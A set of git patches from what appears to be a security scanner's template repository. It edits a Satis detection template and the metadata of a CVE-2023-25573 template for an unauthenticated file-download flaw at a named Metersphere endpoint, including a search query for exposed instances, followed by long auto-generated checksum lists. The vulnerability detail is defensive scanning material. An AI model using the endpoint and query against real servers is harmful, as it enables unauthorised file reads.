Detect author: FlorianMaak severity: info - description: Satis composer repository was detected + description: | + Satis composer repository was detected reference: - https://github.com/composer/satis classification: @@ -27,10 +28,16 @@ http: - type: word part: body words: - - "This is a private Composer repository" - - "Satis" + - 'This is a private repository' + - 'https://github.com/composer/satis' condition: and - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - '\d+\.\d+\.\d+-dev' From 67bf15b8cb761cf51df104654192fc6ac97e934f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 14 Sep 2023 23:02:41 +0530 Subject: [PATCH 0351/1090] Update CVE-2023-25573.yaml --- http/cves/2023/CVE-2023-25573.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index c29889e762..28804f27ea 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: high description: | - metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1 + Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1 remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md @@ -20,11 +20,11 @@ info: epss-percentile: 0.34763 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 + verified: true + fofa-query: body="Metersphere" vendor: metersphere product: metersphere - fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi variables: From 0db11342f4dc39d8bb7612596f850a115cad7e33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Sep 2023 17:35:44 +0000 Subject: [PATCH 0352/1090] Auto Generated New Template Addition List [Thu Sep 14 17:35:43 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c61791f7aa..9f50d0af28 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-25573.yaml http/cves/2023/CVE-2023-30943.yaml http/cves/2023/CVE-2023-39676.yaml http/exposed-panels/phpldapadmin-panel.yaml From 7222b4433631dc8fdeb20c50c20da5f9a95709b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Sep 2023 17:36:25 +0000 Subject: [PATCH 0353/1090] Auto Generated Templates Checksum [Thu Sep 14 17:36:25 UTC 2023] :robot: --- templates-checksum.txt | 429 +++++++++++++++++++++-------------------- 1 file changed, 215 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1bf2c13222..f5544f57b0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -365,14 +365,14 @@ helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e -helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 +helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 -helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898 -helpers/wordpress/plugins/astra-sites.txt:1ee09476b338ca8261ad83be6aefa18693436588 +helpers/wordpress/plugins/antispam-bee.txt:3b6c0ae2aec55040eb96fc7234870be51b6064b6 +helpers/wordpress/plugins/astra-sites.txt:42aae5955584904bc2d13eabc3cf07107b276398 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 @@ -389,7 +389,7 @@ helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a81ab9d3802932cf95bd34d helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4 -helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 +helpers/wordpress/plugins/code-snippets.txt:c02807771e1a750f51754b3494db53c68a5a7d94 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3c1544 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf @@ -412,7 +412,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 -helpers/wordpress/plugins/elementor.txt:24ec44a43838c484230d02510aa13a65219a6d18 +helpers/wordpress/plugins/elementor.txt:62e1d33b9ac0a52b10c98ee1ecbade79436203f4 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 @@ -424,9 +424,9 @@ helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af9414 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/fluentform.txt:f895a9e27c38f0528f64c2fa5b6072dceb0e4e27 helpers/wordpress/plugins/font-awesome.txt:4cb6b226aa8498265c8ea84adcf05e5e168e17c1 -helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 +helpers/wordpress/plugins/force-regenerate-thumbnails.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/formidable.txt:8f2885526d8144ff6d537a7c072cbed12891cf6e -helpers/wordpress/plugins/forminator.txt:b4b8f80f2ea205ffb78bb802455b396e7c718699 +helpers/wordpress/plugins/forminator.txt:bf6e9553dff13b7e82ad8cd7897d9437509f8773 helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe2e17de1bc9 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8 @@ -450,7 +450,7 @@ helpers/wordpress/plugins/insert-headers-and-footers.txt:32fecb37588747cdb822723 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 -helpers/wordpress/plugins/jetpack-boost.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 +helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c helpers/wordpress/plugins/kadence-blocks.txt:76352622a937abb841a04340015012a42290add0 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa @@ -473,7 +473,7 @@ helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0 helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 -helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba +helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f helpers/wordpress/plugins/ninja-forms.txt:2aee11d7a9ddfedc94e7fb36aefcf9174d34d88b helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643 @@ -496,7 +496,7 @@ helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea3 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 -helpers/wordpress/plugins/redux-framework.txt:1375dc6042d338e0d6b89174d9c404b7ebdae9cd +helpers/wordpress/plugins/redux-framework.txt:344b5cffb3c634589e6cd6bc3a7f10de5354fa39 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/seo-by-rank-math.txt:a43557d2fb8277db824695f3e651c31ef604fac4 @@ -517,11 +517,11 @@ helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b1 helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb helpers/wordpress/plugins/tablepress.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 -helpers/wordpress/plugins/the-events-calendar.txt:cffca9b2145cbe8b44269c74219f807eace99c3e +helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c2e796b4046 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:542fcad9f152498b9736a0d61c8dcaf40bf66055 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:14507aa9246588cbf1725303a1878c660615d91a helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:ef52ef5de56c32d1410d7eb141c26ff4e9fbe4b4 @@ -571,7 +571,7 @@ helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60 helpers/wordpress/plugins/wps-hide-login.txt:79eec5c95867be248c5b70dc82c95d33a9b7ef10 helpers/wordpress/plugins/wpvivid-backuprestore.txt:61e0e2ed7647753ca89ac40eac19b4f93c5aad71 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 -helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:8fb4537f45c70359a62b29c044ee196cd3454f82 +helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:0efd87bba254789310048c75b76741c3d4f154d6 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c http/cnvd/2018/CNVD-2018-13393.yaml:b936c60ce1fa7cd38b10597e9038dcb05692bf7c http/cnvd/2019/CNVD-2019-01348.yaml:4bef313f2d9d68a895af773006cc2fe7de376b7b @@ -2538,6 +2538,7 @@ http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44 +http/cves/2023/CVE-2023-25573.yaml:bcb8432ed20142d89d657af522e90cf2e7fad039 http/cves/2023/CVE-2023-25717.yaml:2354eaf519c3e3081c7cef2f15f7497b92f7b1ec http/cves/2023/CVE-2023-26067.yaml:1c8871dc46001d0d8411831bdb6ad00e38874e25 http/cves/2023/CVE-2023-26255.yaml:2d609293d3e23c6f8baa04699fdf45fc1b8e7c12 @@ -5818,218 +5819,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 